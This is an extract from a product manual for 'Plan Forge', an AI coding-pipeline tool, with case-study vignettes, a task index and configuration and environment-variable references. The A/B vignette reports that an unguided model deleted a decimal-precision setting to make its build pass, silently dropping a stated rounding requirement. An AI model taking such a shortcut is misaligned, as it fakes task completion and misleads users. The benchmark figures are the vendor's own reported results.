| 1. The Loop That Never Ends | The full closed-loop audit of a real production Next.js site: a Node discovery crawler emitting structured JSON, a three-lane triage filter, the Crucible eating the bug lane, Tempering re-auditing with the same harness that discovered, and the bug registry auto-smelting regressions back into the next pass, running unattended. | blog post |
| 2. The .NET A/B Test — 99 vs 44 | The same .NET 10 WebAPI built twice from an identical skeleton on the same machine, same afternoon, same Claude Opus 4.6 model. One run with Plan Forge guardrails, one with pure vibe coding. 99 vs 44 on structural quality (4.6× more tests, 6 vs 0 interfaces, 9 vs 0 DTOs), in less wall-clock time. | blog post |
| 3. Quorum Mode in Practice | The same C# invoicing slice executed twice from one hardened plan: once with the default single-model worker, once with a three-model quorum. Both passed every gate and the independent reviewer. The quorum run cost $0.22 more, produced +20% tests, extracted DRY helpers the single run inlined, used relative test dates that survive the calendar, and emitted modern .NET 7+ exception patterns. | blog post |
All three vignettes preserve the pseudonyms used in the original blog posts. "TheProject" in Vignette 1 is a real production Next.js site the maintainer operates; the owner did not clear the real name for publication. Every metric is from the actual run.
Source: "The Loop That Never Ends" · Subject: TheProject (production Next.js site) · What it demonstrates: the closed-loop architecture from Discovery to Tempering, running without a human in the loop after the first pass.
TheProject is a production Next.js site, marketing pages, a product catalog, a handful of interactive demos. Like most sites that grow organically, it had accumulated the usual rot: placeholder copy that never got replaced, stale /docs routes, console errors nobody noticed, href="#" waiting to be wired up. The maintainer had two options. Sit down with a checklist and grind through it; or wire the rot into Plan Forge's closed loop and let the loop close on itself.
Plan Forge's seven-step pipeline reads as a straight line in the diagrams, but the production shape is circular. Four passes, with back-edges that matter as much as the forward ones:
.forge/audits/dev-<ts>.json, groups findings by route and severity, and for each group calls forge_crucible_submit with a title, the raw evidence, and a priority derived from the severity bucket. The Crucible runs its usual interview, the hardener emits a Phase-NN plan with a Scope Contract.pforge run-plan the project uses on itself. The interesting part is what happens after the last slice commits: Tempering re-runs the discovery harness against the newly-deployed preview URL. If the same JSON query that found the problem now returns empty, Tempering reports green. If not, the failures get written to the bug registry.The first version of the Crucible wrapper routed every finding through the Crucible. Console errors, 404s, auth redirects, placeholder regex hits, all of it became a proposed smelt for the Crucible to interview. The interview queue grew to 60+ items and half were noise the Crucible had no business thinking about.
The fix was a three-lane triage before the Crucible ever saw a finding:
| Lane | What goes here | What happens |
|---|---|---|
| Bug lane | Findings with evidence and scope: broken links, console errors, missing assets. | Skip the Crucible entirely. These are not ideas, they are bugs. Route to the bug registry; let auto-smelt fix them in a single pass. |
| Crucible lane | Scope-ambiguous feature work the audit revealed: empty CTAs, "Coming soon" sections, half-built flows. | Submit to the Crucible. The Crucible interviews for scope, the hardener emits the plan, the Forge executes. |
| Noise lane | Auth-redirect 307s, 404s on test-data routes, false-positive regex hits. | Filter at the harness. Never reach the Crucible. Tune signal-to-noise at the source, a discovery harness that cries wolf on auth redirects teaches the Crucible to ignore it. |
The bug lane runs first, fix the known defects, watch Tempering validate them, prove the mechanics end-to-end, then the feature lane opens. If Round 1's bug lane fails, auto-smelt re-ingests and retries without the human. The loop eats its own mistakes before it ever touches the feature backlog. That ordering is what makes the feature lane safe to run unattended.
Over two weeks, with no manual TODO list and no human in the loop after the initial wrapper, the system found 23 placeholders the maintainer did not know existed, 7 broken links from a migration the previous month, and a console error in the checkout flow that had been silently firing for weeks. The loop is still finding things, slower now, but steady.
Four conditions, in order of how long they took to learn:
{"route": "/pricing", "placeholders": ["Coming soon", "TODO: price tiers"], "broken_hrefs": ["#"]}. The discovery harness exists to turn the first into the second.Source: "The A/B Test: 99 vs 44 — Same App, Same Model, Same Time" · Subject: a .NET 10 WebAPI built twice · What it demonstrates: the structural-quality gap between Plan Forge and vibe coding when every other variable is held constant.
Both projects started from an identical .NET 10 WebAPI skeleton, the same git commit, the same empty solution. The requirements were identical: Clients CRUD → Projects CRUD → Invoice Engine with rate tiers, volume discounts, tax calculation, and banker's rounding. Both runs used Claude Opus 4.6. Same machine, same afternoon. The only variable was whether the AI had guardrails.
| Metric | Plan Forge (A) | Vibe coding (B) | Delta |
|---|---|---|---|
| Duration | ~7 min | ~8 min | guardrails did not add overhead |
| Tests | 60 | 13 | 4.6× more |
| Interfaces | 6 | 0 | vibe = 0 |
| DTOs | 9 | 0 | vibe = 0 |
| Typed exceptions | 4 | 0 | vibe = 0 |
| Error middleware | ProblemDetails (RFC 7807) | none | vibe had no error contract |
| Banker's rounding | 5 usages | 0 | requirement silently dropped by vibe |
| CancellationToken | 79 refs | 0 | vibe = 0 |
| .gitignore | present | missing | vibe committed bin/ and obj/ |
| Quality score (/100) | 99 | 44 | 2.25× higher |
The Plan Forge run produced more code, and it produced the right code:
NotFoundException, DuplicateException, ValidationException, BusinessRuleException) mapped via ProblemDetails (RFC 7807) to proper HTTP status codes.MidpointRounding.ToEven) on every financial calculation, the requirement that was explicitly stated but silently dropped by the vibe run.The vibe-coded version works. You can start it, call the endpoints, and get responses. It also has structural problems that block production deployment: 12 build errors on first attempt (the model removed the EF Core decimal precision configuration to make the build pass, silently violating the banker's rounding requirement), no interfaces (controllers cannot be unit-tested), entities exposed directly as API responses (change a column, break the API contract), and 111 build-output files committed to the initial git commit because no .gitignore was generated.
The conventional wisdom is that structure slows you down. More rules, more process, more overhead. Skip the architecture, skip the tests, ship faster. The numbers tell a different story: Plan Forge produced 4.6× more tests and a 2.25× higher quality score in less wall-clock time (7 vs 8 minutes). The guardrails did not add overhead. They prevented the rework loop. The vibe run spent its extra minute fighting the EF Core build errors and applying a fix that sacrificed a requirement.
Guardrails do not slow you down. Rework slows you down. Guardrails prevent rework.
Source: "Quorum Mode: What Happens When 3 AI Models Review Each Other's Code" · Subject: the same C# invoicing slice, executed twice · What it demonstrates: the synthesis effect, when three models propose, the reviewer picks the cleanest approach, and quality compounds for cents on the dollar.
One feature, two executions, identical hardened plan:
Both runs passed every gate. Every slice built, every test passed, and the independent reviewer signed off on both. The interesting part is how they passed.
| Metric | Single (control) | Quorum (3-model) |
|---|---|---|
| Tests written | 15 | 18 (+20%) |
| Helper extraction | Inline, repeated 3× | Reusable helpers, single source |
| Test dates | Hardcoded literals | Relative offsets |
| .NET exception pattern | Generic ValidationException | ArgumentException.ThrowIfNullOrWhiteSpace (.NET 7+) |
| Edge cases covered | Standard happy path | Voided-invoice regeneration, sequence races |
| Total cost | $0.62 | $0.84 (+$0.22) |
| Total time | 12 min | 32 min (2.7×) |
The single-model and the quorum runs are not different code volumes, they are different code shapes. Four named patterns drive the gap:
IsWeekend(), CalculateVolumeDiscount(), and ApplyBankersRounding() as private static helpers because the synthesizer saw multiple proposals and picked the one that did not repeat itself.new DateTime(2026, 3, 15)). Those tests fail when the dates pass and the business logic correctly refuses future invoices. Quorum tests used relative offsets (DateTime.Now.AddDays(-7)) that stay green forever.throw new ValidationException("..."), functional but generic. Quorum run: ArgumentException.ThrowIfNullOrWhiteSpace(), the .NET 7+ recommended API. One model knew about it, the reviewer picked it.The quorum run cost $0.22 more than the control run ($0.84 vs $0.62), about 35% in percentage terms, but still under a dollar total. For a feature that will be maintained for years, the differential is rounding error. The time delta was more significant: 32 minutes vs 12 minutes. The extra twenty minutes is the parallel dry-run analysis (three models thinking) plus the reviewer synthesis step. The actual build time was comparable.
For $0.22 more, you get 20% more tests, cleaner architecture, and modern patterns. That is the cheapest code review you will ever buy.
Quorum mode is not for every slice. Running it on a simple CRUD endpoint that creates a database record is overkill. Running it on an auth flow, billing logic, or a database migration is worth every token. The default --quorum=auto threshold scores each slice's complexity (1–10) using seven weighted signals, file scope count, cross-module dependencies, security keywords, database/migration keywords, gate count, task count, historical failure rate, and only slices at or above the threshold (default 6) get the three-model treatment.
Read together, the three vignettes describe the same shape from three angles. Vignette 1 (the loop) is about making the pipeline survive its own output, Tempering re-auditing with the same tool that discovered, the bug registry auto-smelting regressions, the loop running unattended. Vignette 2 (99 vs 44) is about making the software survive its own future, interfaces and DTOs and typed exceptions and cancellation, the structural quality that separates a prototype from production code. Vignette 3 (quorum) is about making the next slice survive the gap between what one model knows and what another does, the synthesis effect, paid for in cents, banked in code that does not need a second rewrite.
Three vignettes, three different surface areas, one underlying claim: a harness that survives its own output is the difference between a demo and a shop. The chapters this appendix cross-links explain the mechanisms; the blog posts behind the vignettes preserve the first-person account; the receipts above are the part that survives when the version numbers change.
A task-first index over the rest of the manual. Find the verb that matches what you are trying to do; follow the link to the chapter that owns the answer. This appendix adds no new prose, it is pure navigation, sorted by intent rather than by where the chapters happen to live in the book.
Audience: Anyone who knows what they need to do but is not sure which chapter to open. Especially useful when returning to the manual mid-task.
How to use: Pick the intent group closest to your situation, scan the questions, click the answer link. If a task spans multiple chapters, the index lists each cross-ref, read them in order. If you cannot find what you need here, the Book Index covers concepts and the search box in the sidebar covers everything else.
The index is organized by what you are doing, not by what part of Plan Forge you are touching. Most tasks pull in two or three chapters across different Parts:
| Intent group | When to use |
|---|---|
| 1. Install & set up | You are putting Plan Forge on a fresh machine, or onto a new repository. |
| 2. Plan a feature | You have a feature in mind and need to turn it into a hardened plan the Forge can execute. |
| 3. Execute a plan | The plan exists; you are about to (or are mid-way through) running it. |
| 4. Review & ship | The slices have run; you are deciding whether to merge and what to do post-merge. |
| 5. Customize Plan Forge for my project | You want the agent to follow your team's specific patterns, not just the defaults. |
| 6. Operate at scale (teams & fleets) | You are running Plan Forge across multiple repositories, multiple teams, or in an enterprise context. |
| 7. Debug & troubleshoot | Something is broken, missing, or behaving unexpectedly. |
| 8. Extend & integrate | You want to add new tools, glue Plan Forge to your existing systems, or build something on top. |
| 9. Brief stakeholders & onboard readers | You need to walk a colleague, manager, or VP through what Plan Forge is and why it matters. |
pforge smith.pforge smith; expected output is mirrored in Troubleshooting — What a healthy pforge smith looks like.--quorum=auto).copilot-instructions.md safely? Customization — Editing copilot-instructions.md..forge.json? Appendix T — .forge.json Reference; every key with type, default, example, and change impact..forge/secrets.json over committing keys to .forge.json.forge_team_dashboard.pforge-sdk for Node.js clients.forge_graph_query; pattern detectors in forge_patterns_list.forge_sync_instructions for always-true rules; forge_sync_memories for learned lessons; when to run what.This appendix covers tasks. For other navigational layers:
.forge.json ReferenceEvery settable key in the per-project Plan Forge configuration file, type, default, example, and what changes when the value is touched. The canonical source of truth for this reference is CONFIG_SCHEMA in pforge-mcp/capabilities.mjs; this appendix mirrors that schema in human-readable form.
forge_config MCP tool (or the dashboard Config tab) for schema-validated writes, both perform atomic updates (write to temp, then rename) so partial writes never leave a half-valid file. Hand-editing is fine for small changes; just validate the JSON before saving.
The file lives at the repo root as .forge.json. It is read at startup by the orchestrator, the dashboard, and most MCP tools. The schema is intentionally shallow at the top and grouped by subsystem, each top-level key controls one slice of Plan Forge behavior:
| Top-level key | Subsystem it controls | Where it is used |
|---|---|---|
projectName, preset, templateVersion, pipelineVersion | Project identity | OpenBrain memory scoping, preset gating, version checks |
updateSource | Update source mode | pforge update source selection (auto / github-tags / local-sibling) |
meta | Meta-defect routing | forge_meta_bug_file target repository |
agents | Multi-agent adapters | Generates per-agent setup files (Claude / Cursor / Codex) |
modelRouting | Default model selection | Orchestrator slice dispatch, dashboard Cost tab |
forgeMaster | Forge-Master reasoning loop | forge_master_ask, dashboard Forge-Master tab |
maxParallelism, maxRetries, maxRunHistory | Execution limits | Orchestrator DAG scheduling and retention |
quorum | Multi-model consensus | --quorum=... flag, forge_estimate_quorum |
extensions | Installed extensions | pforge ext, Extensions tab |
hooks | LiveGuard lifecycle hooks | PreDeploy, PostSlice, PreAgentHandoff, PostRun |
openclaw | OpenClaw analytics bridge | PreAgentHandoff snapshot push (optional) |
runtime | Inner-loop subsystems | Phase-25 gate synthesis and quorum reviewer |
brain | Memory and federation | OpenBrain federation across local repos |
testbed | Testbed path | forge_testbed_* tools |
The next sections describe each group in detail. Every field row uses the same five columns, Key, Type, Default, Example, Change impact, so the table reads the same way no matter which subsystem you land on.
Four fields tell Plan Forge what kind of project it is looking at. projectName is the most important one, it scopes memory in OpenBrain (so two projects with the same plan name do not collide) and is the default project tag for traces and replay.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
projectName | string | (none) | "plan-forge" | OpenBrain memory namespace; default project tag for replay; affects all memory-related queries. Changing it splits memory between old and new names. |
preset | enum | (none) | "dotnet" | One of dotnet, typescript, python, java, go, swift, azure-iac, custom. Determines which instruction files, agents, and skills are installed by setup. Read by validators and the dashboard. |
templateVersion | string | (none) | "2.56.0" | Records the Plan Forge release that last ran setup here. Compared against the running CLI version so pforge update can detect drift. |
pipelineVersion | string | "2.0" | "2.0" | Pipeline schema version. Rarely changed by users; bumped when the 7-step pipeline contract changes shape. |
updateSource — how pforge update finds the frameworkControls where the pforge update command pulls framework files from. Defaults to auto, which picks the newer of a local sibling clone (if present) and the latest GitHub tag. See Appendix G — Update Source Modes for the full mode-selection story; this entry is the bare schema reference.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
updateSource | enum | "auto" | "github-tags" | One of auto (pick newer of local-sibling and github-tags), github-tags (always GitHub), or local-sibling (always sibling clone). Validated server-side by POST /api/config; invalid values are rejected with HTTP 400. |
meta — meta-defect routingWhere Plan Forge files bugs against itself. When forge_meta_bug_file runs without an explicit target, it reads meta.selfRepairRepo. If the key is missing, it falls back to srnichols/plan-forge.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
meta.selfRepairRepo | string | (fallback: srnichols/plan-forge) | "acme/plan-forge-fork" | Target repository for self-repair issues. Set this if your team maintains a fork or a private mirror. owner/repo form. See self-repair-reporting. |
agents — multi-agent adaptersWhich AI agents have native config files generated alongside the GitHub Copilot defaults. See Chapter 13 — Multi-Agent Setup for what each adapter writes.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
agents | array<enum> | [] | ["claude", "cursor"] | Each entry is one of claude, cursor, codex. Adding an entry causes setup (or setup --agent <name>) to generate that adapter's native file (e.g. CLAUDE.md, .cursorrules). Removing an entry does not delete files, clean those up manually. |
modelRouting — default model selectionWhere slices go by default when no plan-level Model: directive is present. default is the catch-all; execute and review override it for those phases. See Advanced Execution — Model Routing for the routing precedence (plan front-matter > flag > execute/review > default).
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
modelRouting.default | enum | "auto" | "claude-opus-4.7" | One of auto, claude-opus-4.7, claude-opus-4.6, claude-sonnet-4.6, claude-haiku-4.5, gpt-5.4, gpt-5.2-codex, gpt-5-mini, gemini-3-pro-preview. auto lets the host pick based on availability. |
modelRouting.execute | string | (uses default) | "gpt-5.3-codex" | Model for slice execution. Free-form string so newer models work without a CLI upgrade. |
modelRouting.review | string | (uses default) | "claude-opus-4.7" | Model for the Step 5 review gate. Free-form string. |
forgeMaster — Forge-Master reasoning loopConfiguration for the Forge-Master intent-routing layer. The routerModel is the small, cheap model that classifies intent; reasoningModel is the heavier model that synthesises the answer.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
forgeMaster.reasoningModel | string | (falls back to modelRouting.default) | "gpt-4o-mini" | Model used for multi-step reasoning in forge_master_ask. Affects answer quality and per-call cost. |
forgeMaster.reasoningProvider | string | (auto-detected) | "githubCopilot" | Which provider serves the reasoning model. One of githubCopilot, anthropic, openai, xai. If unset, Plan Forge picks based on available API keys. |
forgeMaster.routerModel | string | "grok-3-mini" | "gpt-4o-mini" | Small classifier model that decides which tools to call. Should be cheap and fast; quality matters less than latency. |
forgeMaster.defaultProvider | string | (auto-detected) | "githubCopilot" | Default provider for both router and reasoning if the per-model provider is not set. |
forgeMaster.observerv3.8+ — Background hub subscriber that batches live Plan Forge events and narrates notable patterns. Mute-by-default: enabled must be explicitly set to true. Control via forge_master_observe MCP tool or pforge master observe CLI. Observer is strictly read-only; it cannot invoke write tools or create PRs.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
forgeMaster.observer.enabled | boolean | false | true | Master switch. Must be true for any observation to occur. forge_master_observe returns an "observer disabled" error when this is false. Set env var PFORGE_FORGE_MASTER_OBSERVE_DISABLE=1 to override to false at process level regardless of this setting. |
forgeMaster.observer.maxUsdPerDay | number | 0.10 | 0.25 | Daily USD budget cap. Once the day's narration spend reaches this cap the observer skips LLM calls and logs a budget-block event. Cap is finite; null or Infinity means no cap (not recommended). |
forgeMaster.observer.maxNarrationsPerHour | number | 6 | 12 | Max narration LLM calls per clock hour. Rate-limits the observer during burst activity. |
forgeMaster.observer.batchWindowMs | number | 60000 | 30000 | Event batch flush interval in milliseconds. Lower = more responsive narrations; higher = fewer LLM calls. |
forgeMaster.observer.modelTier | string | null | null | "fast" | Model capability tier for narrations: flagship (quality), mid (balance), fast (cheap, high-volume), or null to inherit ask-mode model. Tier resolves against the existing model registry; no vendor IDs are hardcoded. Valid values are the MODEL_TIERS array in pforge-mcp/enums.mjs. |
forgeMaster.auditorv3.8+ — Configuration for the A4 plan-health-auditor auto-invocation. The auditor is triggered via hooks.postRun.invokeAuditor. Tokens are attributed to a separate forge-master cost entry; the parent run's budget is never charged.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
forgeMaster.auditor.modelTier | string | null | null | "flagship" | Model tier for auditor reasoning: flagship, mid, fast, or null to inherit ask-mode model. Use flagship for highest-quality health analysis; use fast for high-frequency auto-invocation. Valid values are the MODEL_TIERS array in pforge-mcp/enums.mjs. |
forgeMaster.auditor.outputPath | string | ".forge/health/latest.md" | ".forge/health/weekly.md" | Path where the auditor writes its health report, relative to project root. |
Three numeric caps the orchestrator enforces during pforge run-plan.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
maxParallelism | number (1–10) | 3 | 5 | Max concurrent [P]-tagged slices. Higher = faster but more contention on shared resources (the file system, the model provider's rate limit, your wallet). |
maxRetries | number (0–5) | 1 | 2 | How many times a slice will retry after a gate failure before being marked failed. 0 means fail-fast; 5 is the cap to prevent runaway loops. |
maxRunHistory | number (≥1) | 50 | 100 | How many .forge/runs/<timestamp>/ directories are retained on disk. The orchestrator auto-prunes the oldest beyond this cap on every run. |
quorum — multi-model consensusConfiguration for quorum mode. Master switch is enabled; with auto: true the orchestrator only quorums slices whose complexity score crosses threshold. See Advanced Execution — Quorum Mode for the scoring rubric and worked examples, and Complexity Scoring Rubric for the seven signals that drive the score. The CLI --quorum= flag accepts values from the QUORUM_MODES array in pforge-mcp/enums.mjs.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
quorum.enabled | boolean | false | true | Master switch. When false, quorum is off regardless of the other keys. |
quorum.auto | boolean | true | true | When enabled, gate quorum on slice complexity score. When false, every slice fans out. |
quorum.threshold | number (1–10) | 6 | 5 | Complexity score above which auto-mode fires quorum. Lower = more slices use quorum, higher cost. |
quorum.models | array<string> | ["claude-opus-4.7", "gpt-5.3-codex", "gemini-3.1-pro"] | ["claude-opus-4.7", "gpt-5.2-codex"] | Models that participate in the dry-run fan-out. 2–5 entries is typical; minimum is 1 (degrades to advisory). |
quorum.reviewerModel | string | "claude-opus-4.7" | "gpt-5.4" | Model that synthesises the dry-run responses into a single execution plan. |
quorum.dryRunTimeout | number (ms) | 300000 | 600000 | Per-worker timeout in milliseconds. Increase for very large slices; the default is 5 minutes. |
quorum.strictAvailability | boolean | false | true | When true, fail-fast (exit code 2) if any configured model is unavailable. When false (default), drop unavailable models and continue if at least one remains. |
extensions — installed extensionsNames of extensions installed via pforge ext add <name>. Managed by the CLI; rarely edited by hand. See Chapter 12 — Extensions.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
extensions | array<string> | (none) | ["notify-slack", "notify-teams"] | Extension names from the catalog. pforge ext add appends; pforge ext remove deletes. Affects which tools and skills are registered at startup. |
hooks — LiveGuard lifecycle hooksFive hook configurations live under this object: preDeploy (before deploy slices), postSlice (after every slice), preAgentHandoff (multi-agent turn), preCommit (ordered commit-time guard chain), and postRun (after a run completes — auditor auto-invoke). Each section is independent; omit any subsection to accept its defaults.
For the full eight-hook picture, including the Copilot session hooks (SessionStart, PreToolUse, PostToolUse, Stop) configured separately in .github/hooks/plan-forge.json and the PreCommit chain runner, see Customization — Lifecycle Hooks Reference.
hooks.preDeploy| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.preDeploy.enabled | boolean | true | false | Master switch for the PreDeploy hook. Disable only if you have an equivalent external gate. |
hooks.preDeploy.blockOnSecrets | boolean | true | true | When true, block deploy if forge_secret_scan finds anything at severity ≥ high. Set false to demote to a warning. |
hooks.preDeploy.warnOnEnvGaps | boolean | true | true | Warn (do not block) when forge_env_diff finds keys missing from the target environment. |
hooks.preDeploy.scanSince | string (git range) | "HEAD~1" | "HEAD~10" | Git range scanned for secrets. Widen for repos with bursty commit cadence. |
hooks.postSlice| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.postSlice.silentDeltaThreshold | number | 5 | 3 | Drift score delta below this is silent (no log line). |
hooks.postSlice.warnDeltaThreshold | number | 10 | 15 | Drift score delta at or above this prints a warning. Between silent and warn = info. |
hooks.postSlice.scoreFloor | number | 70 | 80 | Absolute drift score floor, below this triggers a red warning regardless of delta. |
hooks.preAgentHandoff| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.preAgentHandoff.injectContext | boolean | true | true | Inject LiveGuard context (drift score, MTTR, open incidents) into the next agent's prompt at handoff. |
hooks.preAgentHandoff.runRegressionGuard | boolean | true | true | Run forge_regression_guard at handoff time. Disable if your CI already does this. |
hooks.preAgentHandoff.cacheMaxAgeMinutes | number | 30 | 60 | Max cache age before LiveGuard tools are re-run. Higher = faster handoffs, staler data. |
hooks.preAgentHandoff.minAlertSeverity | string | "medium" | "high" | Minimum severity for an alert to be injected. One of low, medium, high, critical. |
hooks.preCommit.chain[]Ordered commit-time validation chain executed by .github/hooks/PreCommit.mjs during pforge run-plan. The built-in entries are master-branch-reject first and diff-classify second; the first non-zero exit stops the commit.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.preCommit.chain | array | [{ name: "master-branch-reject", ... }, { name: "diff-classify", ... }] | [{ "name": "custom-check", "command": "node scripts/check.js" }] | Defines the ordered PreCommit chain. Entries run sequentially; first non-zero exit aborts the commit. |
hooks.preCommit.chain[].name | string | "master-branch-reject" / "diff-classify" | "license-scan" | Stable display name for logs and diagnostics. The first built-in entry is master-branch-reject; the second is diff-classify. |
hooks.preCommit.chain[].command | string | node .github/hooks/PreCommit.mjs <name> | node scripts/license-scan.mjs | Command executed for that chain entry. Use a deterministic command that exits non-zero on block. |
hooks.postRun.invokeAuditorv3.8+ — Automatically invoke the A4 plan-health-auditor after a run completes. Two trigger modes: fire on every failure (onFailure), or fire periodically after N runs (everyNRuns). Both are off by default. When both conditions fire on the same run, the auditor is invoked exactly once.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
hooks.postRun.invokeAuditor.onFailure | boolean | false | true | When true, automatically invokes the A4 auditor whenever a plan run ends with at least one failed slice. The auditor's tokens are attributed to a separate forge-master cost entry, never to the parent run's budget. |
hooks.postRun.invokeAuditor.everyNRuns | number | null | null | 5 | Invoke the auditor after every N completed runs (pass or fail). Counter persists in .forge/auditor-state.json. When the state file is absent the first run always triggers. Set to null to disable. Reasonable values: 5–25. |
The auditor is spawned as its own Forge-Master process so its token costs land in forge_cost_report under the forge-master source. Use forge_testbed_findings to query any defects the auditor surfaces. For the full auditor configuration (model tier, output path), see forgeMaster.auditor.
openclaw — OpenClaw analytics bridge (optional)Optional outbound POST on every PreAgentHandoff. Configures the analytics ingest endpoint. Leave unset to disable.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
openclaw.endpoint | string (URL) | (unset = disabled) | "https://openclaw.example/api/ingest" | Ingest endpoint URL. When set, every PreAgentHandoff posts a context snapshot. |
openclaw.apiKey | string | (fallback: .forge/secrets.json#OPENCLAW_API_KEY) | "sk_live_..." | API key. Prefer storing in .forge/secrets.json (gitignored) rather than in .forge.json (typically committed). |
runtime — inner-loop subsystemsOpt-in subsystems added by Phase-25. Both default to off or advisory; existing users see no behavior change without explicit configuration.
runtime.gateSynthesisL6, adaptive gate synthesis from Tempering minima. Suggest-only by default; the orchestrator never mutates plans.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
runtime.gateSynthesis.mode | enum | "suggest" | "off" | One of off (silent), suggest (print advisory), enforce (track in .forge/gate-suggestions.jsonl, Phase-26+). Plans are still never mutated. |
runtime.gateSynthesis.domains | array<enum> | ["domain", "integration", "controller"] | ["domain"] | Which Tempering profiles to emit suggestions for. Trim to reduce noise. |
runtime.reviewerL4, opt-in speed-quorum reviewer that scores slice diffs inside brain.gate-check. Advisory-only by default.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
runtime.reviewer.enabled | boolean | false | true | Master switch. Off by default; turn on to get reviewer verdicts in the dashboard Audit-Loop tile. |
runtime.reviewer.quorumPreset | enum | "speed" | "power" | One of speed (cheaper, faster) or power (flagship models, slower). |
runtime.reviewer.blockOnCritical | boolean | false | false | When true, critical verdicts block the next slice. Advisory-only (false) by design. |
runtime.reviewer.timeoutMs | number (ms) | 30000 | 60000 | Max time to wait for a reviewer response. Increase for power-preset reviewers on large diffs. |
brain — memory and federationOpenBrain federation configuration. Off by default; opt-in via brain.federation.enabled.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
brain.federation.enabled | boolean | false | true | Master switch for cross-project read-only memory federation (L4-lite, Phase-25). |
brain.federation.repos | array<string> | [] | ["E:/GitHub/Rummag"] | Absolute local repo paths only. Relative paths and URL schemes (http, https, ssh, git) are rejected at load time. Each entry is searched read-only by brain_recall. |
testbed — testbed pathWhere the reference testbed repo lives. Required for the forge_testbed_* tools and the --testbedPath override.
| Key | Type | Default | Example | Change impact |
|---|---|---|---|---|
testbed.path | string (path) | (unset = testbed tools error) | "E:/GitHub/plan-forge-testbed" | Absolute or workspace-relative path to the testbed repo. When unset, forge_testbed_run returns ERR_TESTBED_NOT_FOUND with a recovery hint. |
A realistic .forge.json for a TypeScript project that has opted into Claude as a secondary agent, runs quorum on high-complexity slices, and uses OpenBrain federation to read from a sibling repo:
.forge.json, representative{
"projectName": "myapp",
"preset": "typescript",
"templateVersion": "2.56.0",
"updateSource": "auto",
"agents": ["claude"],
"modelRouting": {
"default": "auto",
"execute": "gpt-5.3-codex",
"review": "claude-opus-4.7"
},
"forgeMaster": {
"reasoningModel": "gpt-4o-mini",
"reasoningProvider": "githubCopilot",
"routerModel": "gpt-4o-mini",
"defaultProvider": "githubCopilot",
"observer": {
"enabled": false,
"maxUsdPerDay": 0.10,
"maxNarrationsPerHour": 6,
"batchWindowMs": 60000,
"modelTier": null
},
"auditor": {
"modelTier": null,
"outputPath": ".forge/health/latest.md"
}
},
"maxParallelism": 3,
"maxRetries": 1,
"maxRunHistory": 50,
"quorum": {
"enabled": true,
"auto": true,
"threshold": 6,
"models": ["claude-opus-4.7", "gpt-5.3-codex", "gemini-3.1-pro"],
"reviewerModel": "claude-opus-4.7",
"dryRunTimeout": 300000,
"strictAvailability": false
},
"extensions": ["notify-slack"],
"hooks": {
"preDeploy": { "enabled": true, "blockOnSecrets": true, "warnOnEnvGaps": true, "scanSince": "HEAD~1" },
"postSlice": { "silentDeltaThreshold": 5, "warnDeltaThreshold": 10, "scoreFloor": 70 },
"preAgentHandoff": { "injectContext": true, "runRegressionGuard": true, "cacheMaxAgeMinutes": 30, "minAlertSeverity": "medium" },
"postRun": { "invokeAuditor": { "onFailure": true, "everyNRuns": null } }
},
"brain": {
"federation": {
"enabled": true,
"repos": ["E:/GitHub/shared-platform-memory"]
}
},
"meta": { "selfRepairRepo": "srnichols/plan-forge" }
}
.forge.json interacts with copilot-instructions.md and instruction files when settings conflict..forge.json: provider API keys, server ports, orchestrator timing, telemetry. Includes the full resolution precedence when flags, env vars, secrets, and .forge.json overlap.updateSource: auto | github-tags | local-sibling.quorum.* key does in practice; the complexity scoring rubric that drives auto.agents generates.brain.federation shapes cross-project memory recall.
Every environment variable Plan Forge reads, grouped by subsystem, with type, default, scope, and security note. The companion reference to Appendix T — .forge.json: settings that change per-machine or contain secrets live here; settings that travel with the project live there.
.forge/secrets.json or your shell environment: never in .forge.json. The secrets file is gitignored by default; the env-var fallback works the same way in CI runners and on developer machines. The Provider API Keys table flags every secret with a lock icon.
Plan Forge reads roughly 40 environment variables across nine subsystems. Most have sensible defaults; the only ones you typically set yourself are provider API keys (so the orchestrator can call a model) and server ports (if 3100/3101 conflict with something else on your machine).
| Group | When you touch it |
|---|---|
| Provider API keys | Always, at least one model provider must be configured. |
| Azure OpenAI | Only when routing through Azure OpenAI instead of the model vendor's public API. |
| Server ports and network | Only if the default ports collide or you need to harden the bridge. |
| Project and runtime | Mostly internal (set by tests or by pforge itself). |
| Orchestrator timing | Tuning gate or worker timeouts on slow CI runners. |
| Feature toggles | Enabling experimental subsystems or bypassing checks. |
| Telemetry (OTel) | Sending traces to a collector. |
| Host detection (read-only) | Never, Plan Forge reads these from your IDE to pick the right adapter. |
| CLI internal | Set transiently by pforge itself; documented for transparency only. |
Every field row uses the same six columns, Variable, Type, Default, Scope, Set when, Security, so the table reads the same way no matter which subsystem you land on. Scope is one of per-user (export in your shell profile), per-machine (system env or CI variable), or per-session (transient, set on a single invocation).
The orchestrator needs at least one of these to route a slice through a non-Copilot model. All are read from the environment first, then from .forge/secrets.json as a fallback (see pforge-mcp/secrets.mjs for the loader). The dashboard Config → Secrets tab is the friendliest way to set them, it writes the secrets file atomically and never echoes the value back.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
XAI_API_KEY 🔒 | string | (none) | per-user | You want to route slices through Grok models (grok-4.20, grok-4, grok-3, grok-3-mini). | Secret. Prefer .forge/secrets.json. |
OPENAI_API_KEY 🔒 | string | (none) | per-user | You want GPT models or DALL-E image generation (forge_generate_image). | Secret. Prefer .forge/secrets.json. |
